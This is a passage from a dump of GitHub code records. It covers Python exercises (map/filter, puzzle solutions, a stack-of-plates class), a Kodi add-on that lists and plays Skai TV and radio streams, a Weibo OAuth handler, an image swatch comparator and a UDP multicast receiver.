seg'\n\n\nnuevo_output = list(map(convertir_en_string_mas_unidad, numeros))\nprint(nuevo_output)\n\n\ndef convertir_a_numeros_negativos(numero):\n return numero * -1\n\n\nlist(map(convertir_a_numeros_negativos, numeros))\n\n\ndef convertir_en_0_si_menor_a_5(numero):\n if numero < 5:\n return 0\n else:\n return numero\n\n\nlist(map(convertir_en_0_si_menor_a_5, numeros))\n\n\ndef convertir_en_true_si_mayor_a_6(numero):\n if numero > 6:\n return True\n else:\n return 
False\n\n\nlist(map(convertir_en_true_si_mayor_a_6, numeros))\n\n\n#filter\nnumeros_2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\ndef numero_es_par(numero):\n if numero % 2 == 0:\n return True\n else:\n return False\n\nprint('Filter')\nprint(list(filter(numero_es_par, numeros_2)))\n\n\ndef palabra_tiene_mas_de_5_caracteres(palabra):\n if len(palabra) > 5:\n return True\n\n\npalabras = [\"achicoria\", \"pasto\", \"sol\", \"loquillo\", \"moquillo\", \"sed\", \"pez\", \"jacaranda\", \"mil\"]\n\nlist(filter(palabra_tiene_mas_de_5_caracteres, palabras))\n\n\ndef numero_es_negativo(numero):\n if numero < 0:\n return True\n\n\nnumeros = [3, 5, -1, -7, -8, 4, -78, 5, -46, 56, 98, 9, -1, -2, -4]\n\nlist(filter(numero_es_negativo, numeros))\n\n\ndef numero_es_divisible_entre_9(numero):\n if numero % 9 == 0:\n return True\n\n\nnumeros = [3, 7, 9, 34, 72, 90, 87, 34, 99, 56, 12, 18]\n\nlist(filter(numero_es_divisible_entre_9, numeros))\n\n\n#AND\ndef numero_es_divisible_entre_3(numero):\n if numero % 3 == 0:\n return True\n else:\n return False\n\n\ndef numero_es_menor_que_10(numero):\n if numero < 10:\n return True\n else:\n return False\n\nnumero_es_divisible_entre_3(9) and numero_es_menor_que_10(9)\n\n\nnumeros = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]\n\n\ndef numero_es_divisible_entre_3_y_menor_que_10(numero):\n return numero_es_divisible_entre_3(numero) and numero_es_menor_que_10(numero)\n\nnuevo_output_2 = list(filter(numero_es_divisible_entre_3_y_menor_que_10, numeros))\nprint(nuevo_output_2)\n\n\n#not\nnuevo_output_3 = not(numero_es_divisible_entre_3(9))\nprint(nuevo_output_3)\n\n#lambda\n\nnuevo_output_4 = list(filter(lambda x: not numero_es_divisible_entre_3(x), numeros))\nprint(nuevo_output_4)\n\npalabras = [\"achicoria\", \"pasto\", \"sol\", \"loquillo\", \"moquillo\", \"sed\", \"pez\", \"jacaranda\", \"mil\"]\n\nlist(filter(lambda x: len(x) > 5, palabras))\n\n\n\n","repo_name":"Fresitaconcrema/Modulo4","sub_path":"Procesamiento_de_datos/bd_3_programacion_funcional.py","file_name":"bd_3_programacion_funcional.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"12922418326","text":"N = int(input())\ninfo_dict = {}\norder_list = []\nboard = [[0 for _ in range(N)] for _ in range(N)]\nfor i in range(N**2):\n tmp = list(map(int, input().split()))\n info_dict[tmp[0]] = tmp[1:]\n order_list.append(tmp[0])\n\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\n\ndef search(ns):\n # 0 : like_cnt, 1 : empty_cnt\n like_info = {0 : [], 1: [], 2:[], 3:[], 4:[]}\n empty_info = {0 : [], 1: [], 2:[], 3:[], 4:[]}\n for i in range(N):\n for j in range(N):\n x, y = i, j\n if board[x][y] != 0 : continue\n like_cnt, empty_cnt = 0, 0\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n if 0 <= nx < N and 0 <= ny < N :\n if board[nx][ny] in info_dict[ns] : like_cnt += 1\n like_info[like_cnt].append([x, y])\n for k in range(4, -1, -1):\n if len(like_info[k]) == 1 :\n x, y = like_info[k][0]\n board[x][y] = ns\n break\n elif len(like_info[k]) > 1 :\n like_info[k].sort()\n for it in range(len(like_info[k])):\n x, y = like_info[k][it]\n empty_cnt = 0\n for d in range(4):\n nx = x + dx[d]\n ny = y + dy[d]\n if 0 <= nx < N and 0 <= ny < N :\n if board[nx][ny] == 0 : empty_cnt += 1\n empty_info[empty_cnt].append([x, y])\n for empty in range(4, -1, -1):\n if empty_info[empty] :\n empty_info[empty].sort()\n x, y = empty_info[empty][0]\n board[x][y] = ns\n break\n break\ndef scoring():\n global score\n 
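    # Hedged clarifying note: assuming this submission targets BOJ 21608, s_list[k] is the score awarded when k adjacent seats hold liked students -- 0, 1, 10, 100, 1000.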
s_list = [0, 1, 10, 100, 1000]\r\n    for i in range(N):\r\n        for j in range(N):\r\n            x, y = i, j\r\n            student = board[x][y]\r\n            cnt = 0\r\n            for d in range(4):\r\n                nx = x + dx[d]\r\n                ny = y + dy[d]\r\n                if 0 <= nx < N and 0 <= ny < N :\r\n                    if board[nx][ny] in info_dict[student] : cnt += 1\r\n            score += s_list[cnt]\r\n\r\ndef solve():\r\n    for st in range(N**2):\r\n        search(order_list[st])\r\n    scoring()\r\n\r\nscore = 0\r\nsolve()\r\nprint(score)","repo_name":"HPYoo/swcodingtest","sub_path":"prob21608.py","file_name":"prob21608.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"41563830126","text":"__author__ = 'bilge'\ndef distance(point1, point2):\n    \"\"\"\n    Returns the Euclidean distance of two points in the Cartesian Plane.\n\n    >>> distance([3,4],[0,0])\n    5.0\n    >>> distance([3,6],[10,6])\n    7.0\n    \"\"\"\n    return ((point1[0] - point2[0])**2 + (point1[1] - point2[1])**2) ** 0.5\n\n\ndata = [[0,1],[2,3],[4,5]]\ndata2 = data[:]  # work on a copy so data[-1] stays a fixed reference point\nwhile data2:\n    # Greedy nearest-neighbour pass: print the point closest to the reference,\n    # then drop the visited point so the loop terminates.\n    nearest = min(data2, key=lambda x: distance(data[-1], x))\n    print(nearest)\n    data2.remove(nearest)\n","repo_name":"aysebilgegunduz/vehicle_routing_problem","sub_path":"deneme.py","file_name":"deneme.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"74194790074","text":"import logging\nimport json\nfrom weibo import Client\n\nfrom .base import BaseHandler\n\n\nclass HomeHandler(BaseHandler):\n\n    logger = logging.getLogger('tomorrow.utiltiy.sina.home')\n    def get(self):\n        key, secret = self.get_app()\n        error = self.get_argument('err', None)\n        return self.render(\n            'utility/sina/home.html',\n            key=key,\n            secret=secret,\n            error=error\n        )\n\n    def post(self):\n        app_key = self.get_argument('app-key')\n        app_secret = self.get_argument('app-secret')\n        self.set_app(app_key, app_secret)\n        client = Client(api_key=app_key, api_secret=app_secret,\n                        redirect_uri=self.callback_url)\n\n        return self.write(json.dumps({'url': client.authorize_url}))\n\n\n","repo_name":"TylerTemp/tomorrow","sub_path":"lib/hdlr/utility/sina/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71259439355","text":"# Find Digits\n# https://www.hackerrank.com/challenges/find-digits/problem\n\nl = []\nfor _ in range(int(input().strip())):\n    n = int(input().strip())\n    a = list(map(int, str(n)))\n    count = 0\n    for i in a:\n        if i != 0 and n % i == 0: count += 1\n    l.append(count)\nprint(*l, sep = '\\n')\n","repo_name":"harshildarji/Algorithms-HackerRank","sub_path":"Implementation Challenges/Find Digits.py","file_name":"Find Digits.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"16402024685","text":"# -*- coding: utf-8 -*-\n\n'''\n    Skai Player Addon\n    Author Twilight0\n\n    SPDX-License-Identifier: GPL-3.0-only\n    See LICENSES/GPL-3.0-only for more information.\n'''\n\nimport json, re\nfrom base64 import b64decode\nfrom tulip import bookmarks, directory, client, cache, control, youtube\nfrom tulip.parsers import itertags\nfrom tulip.compat import zip, iteritems\nfrom youtube_resolver import resolve as yt_resolver\n\ncache_method = cache.FunctionCache().cache_method\n\n\nclass Indexer:\n\n    def __init__(self):\n\n        self.list = []; self.data = []\n        self.base_link = 'https://www.skaitv.gr'\n        self.old_base = 'https://www.skai.gr'\n        self.radio_base = 'http://www.skairadio.gr'\n        self.yt_channel = 
self.yt_channel = 'UCmHgxU394HiIAsN1fMegqzw'\n self.yt_key = b64decode('0AXQxNFejdVT2w2RtY0V1cWMrl3YSFjVyQEUUl3Sfp0Q5NVY6lUQ'[::-1])\n self.tvshows_link = ''.join([self.base_link, '/shows/seires'])\n self.entertainment_link = ''.join([self.base_link, '/shows/psuchagogia'])\n self.news_link = ''.join([self.base_link, '/shows/enimerosi'])\n self.live_link = ''.join([self.base_link, '/live'])\n self.podcasts_link = ''.join([self.radio_base, '/shows?page=0'])\n self.play_link = 'https://videostream.skai.gr/skaivod/_definst_/mp4:skai/'\n self.radio_link = 'https://skai.live24.gr/skai1003'\n\n def root(self, audio_only=False):\n\n self.list = [\n {\n 'label': control.lang(30001),\n 'title': 'Skai Live TV',\n 'action': 'play',\n 'isFolder': 'False',\n 'icon': 'live.png',\n 'url': self.live_link\n }\n ,\n {\n 'label': control.lang(30014),\n 'title': 'Skai Radio 100.3FM',\n 'action': 'play',\n 'url': self.radio_link,\n 'isFolder': 'False',\n 'icon': 'live.png'\n }\n ,\n {\n 'title': control.lang(30006),\n 'action': 'news',\n 'icon': 'news.png'\n }\n ,\n {\n 'title': control.lang(30002),\n 'action': 'shows',\n 'icon': 'tvshows.png',\n 'url': self.tvshows_link\n }\n ,\n {\n 'title': control.lang(30015),\n 'action': 'shows',\n 'icon': 'entertainment.png',\n 'url': self.entertainment_link\n }\n ,\n {\n 'title': control.lang(30003),\n 'action': 'podcasts',\n 'icon': 'podcasts.png'\n }\n ,\n {\n 'title': control.lang(30004),\n 'action': 'archive',\n 'icon': 'archive.png'\n }\n ,\n {\n 'title': control.lang(30005),\n 'action': 'latest',\n 'icon': 'latest.png'\n }\n ,\n {\n 'title': control.lang(30008),\n 'action': 'bookmarks',\n 'icon': 'bookmarks.png'\n }\n ]\n\n if audio_only:\n\n self.list = [self.list[1]] + [self.list[3]]\n\n for item in self.list:\n\n cache_clear = {'title': 30009, 'query': {'action': 'cache_clear'}}\n item.update({'cm': [cache_clear]})\n\n directory.add(self.list, content='videos')\n\n def bookmarks(self):\n\n self.list = bookmarks.get()\n\n if not self.list:\n na = [{'title': control.lang(30018), 'action': None}]\n directory.add(na)\n return\n\n for i in self.list:\n bookmark = dict((k, v) for k, v in iteritems(i) if not k == 'next')\n bookmark['delbookmark'] = i['url']\n i.update({'cm': [{'title': 30502, 'query': {'action': 'deleteBookmark', 'url': json.dumps(bookmark)}}]})\n\n self.list = sorted(self.list, key=lambda k: k['title'].lower())\n\n directory.add(self.list, content='videos')\n\n @cache_method(172800)\n def yt_playlists(self):\n\n return youtube.youtube(key=self.yt_key).playlists(self.yt_channel)\n\n @cache_method(3600)\n def yt_videos(self):\n\n return youtube.youtube(key=self.yt_key).videos(self.yt_channel, limit=2)\n\n @cache_method(3600)\n def yt_playlist(self, url):\n\n return youtube.youtube(key=self.yt_key).playlist(url)\n\n def archive(self):\n\n self.list = self.yt_playlists()\n\n if self.list is None:\n return\n\n for i in self.list:\n i['title'] = client.replaceHTMLCodes(i['title'])\n i.update({'action': 'episodes'})\n bookmark = dict((k, v) for k, v in iteritems(i) if not k == 'next')\n bookmark['bookmark'] = i['url']\n i.update({'cm': [{'title': 30501, 'query': {'action': 'addBookmark', 'url': json.dumps(bookmark)}}]})\n\n control.sortmethods('title')\n\n directory.add(self.list, content='videos')\n\n def shows(self, url):\n\n self.list = self.generic_listing(url)\n\n if self.list is None:\n return\n\n for i in self.list:\n\n i.update({'action': 'episodes'})\n\n bookmark = dict((k, v) for k, v in iteritems(i) if not k == 'next')\n bookmark['bookmark'] = 
i['url']\n\n i.update({'cm': [{'title': 30501, 'query': {'action': 'addBookmark', 'url': json.dumps(bookmark)}}]})\n\n directory.add(self.list, content='videos')\n\n @cache_method(3600)\n def pod_listing(self, url):\n\n html = client.request(url)\n\n listing = client.parseDOM(html, 'div', attrs={'class': 'row border-bottom pt-4 m-0 show-item'})\n\n nexturl = re.sub(r'\\d(?!\\d)', lambda x: str(int(x.group(0)) + 1), url)\n\n for item in listing:\n\n title = client.parseDOM(item, 'h3')[0].replace(''', '\\'')\n if title.startswith(')', select, re.S)\n\n for pod in pods:\n\n date = re.search(r'(\\d{2}/\\d{2}/\\d{4})', pod).group(1)\n title = ' - '.join([client.parseDOM(html, 'h2', attrs={'class': 'mb-3.+?'})[0], date])\n url = ''.join([self.radio_base, re.search(r'data-url = \"([\\w\\-/]+)\"', pod).group(1)])\n\n self.list.append({'title': title, 'image': image, 'url': url})\n\n return self.list\n\n def episodes(self, url):\n\n if self.base_link in url:\n self.list = self.episodes_listing(url)\n elif self.radio_base in url:\n self.list = self.pod_episodes(url)\n else:\n self.list = self.yt_playlist(url)\n\n if self.list is None:\n\n return\n\n for i in self.list:\n\n i.update({'action': 'play', 'isFolder': 'False'})\n\n directory.add(self.list, content='videos')\n\n @cache_method(3600)\n def video_listing(self, url):\n\n html = client.request(url)\n\n try:\n nexturl = ''.join(\n [\n self.old_base, '/videos',\n client.parseDOM(html, 'a', attrs={'rel': 'next'}, ret='href')[0].replace('&', '&')\n ]\n )\n except IndexError:\n nexturl = None\n\n video_list = client.parseDOM(html, 'div', attrs={'class': 'videoItem cell'}, ret='data-video-url')\n thumbnails = client.parseDOM(html, 'div', attrs={'class': 'videoItem cell'}, ret='data-video-poster')\n titles = client.parseDOM(html, 'div', attrs={'class': 'videoItem cell'}, ret='data-video-name')\n dates = client.parseDOM(html, 'div', attrs={'class': 'videoItem cell'}, ret='data-video-date')\n\n listing = list(zip(titles, dates, thumbnails, video_list))\n\n for title, date, image, video in listing:\n\n title = client.replaceHTMLCodes(title)\n\n label = ''.join([title, ' ', '(', date, ')'])\n\n self.list.append(\n {\n 'title': label, 'image': image, 'url': video, 'next': nexturl, 'nextlabel': 30500,\n 'nextaction': 'videos'\n }\n )\n\n return self.list\n\n def videos(self, url):\n\n self.list = self.video_listing(url)\n\n if self.list is None:\n return\n\n for i in self.list:\n\n i.update({'action': 'play', 'isFolder': 'False'})\n\n directory.add(self.list)\n\n def latest(self):\n\n self.list = self.yt_videos()\n\n if self.list is None:\n return\n\n self.list = [i for i in self.list if int(i['duration']) > 60]\n\n for i in self.list:\n i.update({'action': 'play', 'isFolder': 'False'})\n\n directory.add(self.list)\n\n def news(self):\n\n self.list = [\n {\n 'title': 30011,\n 'action': 'episodes',\n 'icon': 'news.png',\n 'url': ''.join([self.base_link, '/show/enimerosi/oi-eidiseis-tou-ska-stis-2/sezon-2021-2022'])\n }\n ,\n {\n 'title': 30012,\n 'action': 'episodes',\n 'icon': 'news.png',\n 'url': ''.join([self.base_link, '/show/enimerosi/ta-nea-tou-ska-stis-2000/sezon-2021-2022'])\n }\n ,\n {\n 'title': 30005,\n 'action': 'videos',\n 'icon': 'latest.png',\n 'url': ''.join([self.old_base, '/videos?type=recent'])\n }\n ,\n {\n 'title': 30016,\n 'action': 'videos',\n 'icon': 'popular.png',\n 'url': ''.join([self.old_base, '/videos?type=popular'])\n }\n ,\n {\n 'title': 30017,\n 'action': 'videos',\n 'icon': 'recommended.png',\n 'url': ''.join([self.old_base, 
'/videos?type=featured'])\n }\n ]\n\n directory.add(self.list, content='videos')\n\n def play(self, url):\n\n resolved = self.resolve(url)\n\n if 'youtu' in resolved:\n resolved = self.yt_session(resolved)\n\n if isinstance(resolved, tuple):\n\n stream, plot = resolved\n meta = {'plot': plot}\n\n else:\n\n stream = resolved\n meta = None\n\n icon = None\n\n if url == self.live_link:\n\n icon = {'poster': control.icon(), 'icon': control.icon(), 'thumb': control.icon()}\n\n dash = ('dash' in stream or '.mpd' in stream or 'm3u8' in stream) and control.kodi_version() >= 18.0\n\n directory.resolve(\n url=stream, meta=meta, dash=dash, icon=icon,\n mimetype='application/vnd.apple.mpegurl' if 'm3u8' in stream else None,\n manifest_type='hls' if '.m3u8' in stream else None\n )\n\n @cache_method(1440)\n def generic_listing(self, url):\n\n html = client.request(url)\n\n if url == self.news_link:\n new = 'row m-0 listrow new-videos'\n new_items = 'col-12 pl-0 pr-0 list1 list-item color_enimerosi'\n archive = 'row m-0 listrow s234 '\n archived_items = 'col-12 pl-0 pr-0 list1 list-item color_enimerosi'\n elif url == self.entertainment_link:\n new = 'row listrow list2 '\n new_items = 'd-none d-md-block col-md-4 listimg color_psuchagogia'\n archive = 'row listrow list2 s234 '\n archived_items = 'd-none d-md-block col-md-3 listimg color_psuchagogia'\n else:\n new = 'row listrow list2 '\n new_items = 'd-none d-md-block col-md-4 listimg color_seires'\n archive = 'row listrow list2 s234 '\n archived_items = 'd-none d-md-block col-md-3 listimg color_seires'\n\n div = client.parseDOM(html, 'div', attrs={'class': new})[0]\n\n listing = client.parseDOM(div, 'div', attrs={'class': new_items})\n\n for item in listing:\n\n title = client.parseDOM(item, 'h3')[0]\n image = client.parseDOM(item, 'img', ret='src')[0]\n\n url = ''.join([self.base_link, client.parseDOM(item, 'a', ret='href')[0]])\n\n self.list.append({'title': title, 'url': url, 'image': image})\n\n if 's234' in html:\n\n div = client.parseDOM(html, 'div', attrs={'class': archive})[0]\n items = client.parseDOM(div, 'div', attrs={'class': archived_items})\n\n for item in items:\n\n title = ' - '.join([client.parseDOM(item, 'h3')[0], control.lang(30013)])\n image = client.parseDOM(item, 'img', ret='src')[0]\n\n url = ''.join([self.base_link, client.parseDOM(item, 'a', ret='href')[0]])\n\n self.list.append({'title': title, 'url': url, 'image': image})\n\n return self.list\n\n @cache_method(180)\n def episodes_listing(self, url):\n\n html = client.request(url)\n\n div = client.parseDOM(html, 'div', attrs={'class': 'row listrow list2 ?'})[0]\n\n listing = [i.text for i in itertags(div, 'div')]\n\n for item in listing:\n\n try:\n title = client.parseDOM(item, 'h3')[0].replace('
', ' ').replace('
', ' ')\n except Exception:\n continue\n image = client.parseDOM(item, 'img', ret='src')[0]\n\n url = ''.join([self.base_link, client.parseDOM(item, 'a', ret='href')[0]])\n\n self.list.append({'title': title, 'url': url, 'image': image})\n\n return self.list\n\n @cache_method(720)\n def episode_resolver(self, url):\n\n html = client.request(url)\n\n if url.startswith(self.radio_base):\n\n url = re.search(r'[\"\\'](.+?\\.mp3)[\"\\']', html).group(1)\n\n return url\n\n else:\n\n json_ = re.search(r'var data = ({.+})', html).group(1)\n\n json_ = json.loads(json_)\n\n url = ''.join([self.play_link, json_['episode'][0]['media_item_file'], '/chunklist.m3u8'])\n\n plot = client.stripTags(json_['episode'][0]['descr'])\n\n return url, plot\n\n def resolve(self, url):\n\n if url == self.live_link:\n\n html = client.request(self.live_link)\n\n json_ = re.search(r'var data = ({.+?});', html).group(1)\n\n json_ = json.loads(json_)\n\n return json_['now']['livestream']\n\n elif len(url) == 11:\n\n link = self.yt_session(url)\n\n return link\n\n elif 'episode' in url:\n\n return self.episode_resolver(url)\n\n else:\n\n return url\n\n @staticmethod\n def yt_session(link):\n\n streams = yt_resolver(link)\n\n try:\n addon_enabled = control.addon_details('inputstream.adaptive').get('enabled')\n except KeyError:\n addon_enabled = False\n\n if not addon_enabled:\n\n streams = [s for s in streams if 'mpd' not in s['title']]\n\n stream = streams[0]['url']\n\n return stream\n","repo_name":"gggbbbuuu/GM","sub_path":"addons/plugin.video.skai.gr/resources/lib/skai.py","file_name":"skai.py","file_ext":"py","file_size_in_byte":16294,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"96"} +{"seq_id":"21518654853","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom argparse import ArgumentParser\r\nfrom collections import namedtuple\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\n\r\nfrom PIL import Image\r\n\r\n\r\nRectangle = namedtuple('Recltangle', 'x,y,width,height')\r\n\r\nparser = ArgumentParser(\r\n '''\r\n Compare two rectangular areas of an image\r\n '''\r\n)\r\nparser.add_argument(\r\n '--rectangle1',\r\n nargs=4,\r\n type=int,\r\n required=True,\r\n help='''\r\n X, Y, Width and Height of the first rectangle to compare\r\n ''',\r\n)\r\nparser.add_argument(\r\n '--rectangle2',\r\n nargs=4,\r\n type=int,\r\n required=True,\r\n help='''\r\n X, Y, Width and Height of the second rectangle to compare\r\n ''',\r\n)\r\nparser.add_argument(\r\n 'image',\r\n help='''\r\n The image whose areas to compare\r\n ''',\r\n)\r\n\r\n\r\ndef split_and_avg_channels(sample):\r\n return (\r\n sample[:, :, 0].mean(),\r\n sample[:, :, 1].mean(),\r\n sample[:, :, 2].mean(),\r\n )\r\n\r\n\r\ndef main():\r\n args = parser.parse_args()\r\n image = Image.open(args.image)\r\n nparray = np.array(image)\r\n sample_rect1 = Rectangle(*args.rectangle1)\r\n sample_rect2 = Rectangle(*args.rectangle2)\r\n sample1 = nparray[\r\n sample_rect1.y : sample_rect1.y + sample_rect1.height,\r\n sample_rect1.x : sample_rect1.x + sample_rect1.width\r\n ]\r\n sample2 = nparray[\r\n sample_rect2.y : sample_rect2.y + sample_rect2.height,\r\n sample_rect2.x : sample_rect2.x + sample_rect2.width\r\n ]\r\n r1, g1, b1 = split_and_avg_channels(sample1)\r\n r2, g2, b2 = split_and_avg_channels(sample2)\r\n print('R1 = {}, G1 = {}, B1 = {}'.format(r1, g1, b1))\r\n print('R2 = {}, G2 = {}, B2 = {}'.format(r2, g2, b2))\r\n\r\nmain()\r\n# with love from makeda and 
oleg","repo_name":"drcandacemakedamoore/opensource4medicine","sub_path":"compare_swatches.py","file_name":"compare_swatches.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"40272958307","text":"# RECEIVER\nimport socket\nimport struct\n\nMCAST_GRP = '224.1.1.1'\nMCAST_PORT = 5004\n\n# Multicast\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\nsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\nsock.bind(('', MCAST_PORT))\nmreq = struct.pack(\"4sl\", socket.inet_aton(MCAST_GRP), socket.INADDR_ANY)\n\nsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n\n# Broadcast\nUDP_IP = '127.0.0.2' # Mengikat ke semua antarmuka jaringan yang tersedia\nUDP_PORT = 5006\n\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nclient_socket.bind((UDP_IP, UDP_PORT))\n\n\nwhile True:\n # Multicast\n print(f\"ini multicast : {sock.recv(10240)}\")\n \n # Broadcast\n data, address = client_socket.recvfrom(1024)\n print(f\"Menerima data dari {address}: {data.decode()}\")","repo_name":"IvanSholana/TubesProgjar","sub_path":"Client_2.py","file_name":"Client_2.py","file_ext":"py","file_size_in_byte":818,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"73649779836","text":"# 約数の数を数える\ndef divisor_count(num):\n if num == 1:\n return 1\n if num < 1:\n return 0\n result = 1\n\n calcNum = num\n count = 0\n\n while calcNum % 2 == 0:\n calcNum //= 2\n count += 1\n\n if count != 0:\n result *= count + 1\n\n suggest_prime = 3\n while suggest_prime <= calcNum:\n count = 0\n while calcNum % suggest_prime == 0:\n calcNum //= suggest_prime\n count += 1\n if count != 0:\n result *= count + 1\n suggest_prime += 2\n\n return result\n\ncount = 500\ntriangle = 1\n\ntmp_num = 2\nwhile divisor_count(triangle) <= count:\n triangle += tmp_num\n tmp_num += 1\n\nprint(triangle)\n","repo_name":"KKishikawa/project-euler-for-study-code","sub_path":"011-020/012.py","file_name":"012.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74676260155","text":"class Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None\r\n\r\n\r\nclass Stack:\r\n def __init__(self):\r\n self.head = None\r\n self.minimum = []\r\n self.size = 0\r\n\r\n def get_size(self):\r\n return self.size\r\n\r\n def push(self, data):\r\n node = Node(data)\r\n if self.head == None:\r\n self.head = node\r\n else:\r\n node.next = self.head\r\n self.head = node\r\n self.minimum.append(node.data)\r\n self.size += 1\r\n\r\n def print_list(self):\r\n current = self.head\r\n show = \"\"\r\n while current != None:\r\n show += str(current.data) + ' '\r\n current = current.next\r\n return show\r\n\r\n def pop(self):\r\n if self.head == None:\r\n self.minimum = []\r\n self.size = 0\r\n return None\r\n else:\r\n tmp = self.head\r\n self.head = tmp.next\r\n self.minimum.remove(tmp.data)\r\n\r\n if tmp.data is not None:\r\n self.size += 1\r\n return tmp.data\r\n\r\n\r\nclass SetOfStacks:\r\n def __init__(self):\r\n self.stacks = []\r\n self.capacity = 3\r\n self.number_stacks = 0\r\n\r\n def push(self, data):\r\n if len(self.stacks) == 0:\r\n stack = Stack()\r\n stack.push(data)\r\n self.stacks.append(stack)\r\n\r\n else:\r\n current_stack = self.stacks[self.number_stacks]\r\n if current_stack.get_size() >= 3:\r\n new_stack = Stack()\r\n 
new_stack.push(data)\r\n self.stacks.append(new_stack)\r\n self.number_stacks += 1\r\n else:\r\n current_stack.push(data)\r\n\r\n def pop(self):\r\n last_index = len(self.stacks) - 1\r\n last_stack = self.stacks[last_index]\r\n last_stack.pop()\r\n if last_stack.get_size() == 0:\r\n self.number_stacks -= 1\r\n del self.stacks[last_index]\r\n\r\n def print_list(self):\r\n show = \"\"\r\n for i in range(len(self.stacks)):\r\n show += \"Stack \" + str(i+1) + \": \"\r\n stack = self.stacks[i]\r\n show += stack.print_list()\r\n show += \"\\n\"\r\n print(show)\r\n\r\n\r\nset_of_stacks = SetOfStacks()\r\nset_of_stacks.push(3)\r\nset_of_stacks.push(4)\r\nset_of_stacks.push(5)\r\nset_of_stacks.push(1)\r\nset_of_stacks.push(0)\r\nset_of_stacks.push(7)\r\nset_of_stacks.push(9)\r\n\r\nset_of_stacks.print_list()\r\nset_of_stacks.pop()\r\nset_of_stacks.pop()\r\nset_of_stacks.pop()\r\nset_of_stacks.print_list()","repo_name":"zalogarciam/CrackingTheCodeInterview","sub_path":"Chapter 3/StackOfPlates.py","file_name":"StackOfPlates.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"16500462601","text":"from qtpy import QtCore, QtGui, QtWidgets\nfrom graide.utils import ModelSuper, DataObj\nimport traceback\nimport os\n\n#for line in traceback.format_stack(): print(line.strip())\n\n\"\"\"\n Here is a summary of how the Python Slots and Signals interact to update the Glyph tab when a glyph is clicked:\n\n Set up connections:\n runView.glyphSelect.connect(passesView.changeGlyph)\n mainWindow.tab_passes.glyphSelected.connect(mainWindow.glyphSelected)\n mainWindow.tab_passes.glyphSelected.connect(mainwindow.glyphAttrib.changeData)\n\n Then when a glyph is clicked on:\n RunView::changeSelection\n calls self.glyphSelected.emit (defined as Signal)\n PassesView::changeGlyph\n calls self.glyphSelected.emit (defined as Signal)\n MainWindow::glyphSelected\n ...\n AttribView::changeData\n\"\"\"\n\nclass LinePlainTextEdit(QtWidgets.QPlainTextEdit) :\n\n editFinished = QtCore.Signal()\n\n def keyPressEvent(self, key) :\n if key.matches(QtGui.QKeySequence.InsertParagraphSeparator) :\n # or key.matches(QtGui.QKeySequence.InsertLineSeparator) :\n self.editFinished.emit()\n else :\n return super(LinePlainTextEdit, self).keyPressEvent(key)\n \n\nclass AttrValueListDialog(QtWidgets.QDialog) :\n \n def __init__(self, parent, glyphName, gClassList) :\n super(AttrValueListDialog,self).__init__(parent)\n \n # Hide the help icon, all it does it take up space.\n #icon = self.windowIcon() -- just in case icon gets lost\n flags = self.windowFlags()\n helpFlag = QtCore.Qt.WindowContextHelpButtonHint\n flags = flags & (~helpFlag)\n self.setWindowFlags(flags)\n #self.setWindowIcon(icon)\n\n self.setWindowTitle(glyphName)\n listWidget = QtWidgets.QListWidget(self)\n #listWidget.clicked.connect(self.doReturn)\n itemHeight = 18\n cnt = 0\n for gClass in gClassList:\n if gClass == \"\" or gClass == \" \" :\n continue\n \n item = QtWidgets.QListWidgetItem(gClass)\n item.setSizeHint(QtCore.QSize(200, itemHeight))\n listWidget.addItem(item)\n cnt = cnt + 1\n \n listWidget.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n if cnt <= 25 :\n displayCnt = 4 if cnt < 5 else cnt\n listWidget.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOff)\n # It's okay if the list and dialog widths don't match, since there's no scroll bar.\n # Make the list widget wide enough that they can expand the dialog and see wide names.\n 
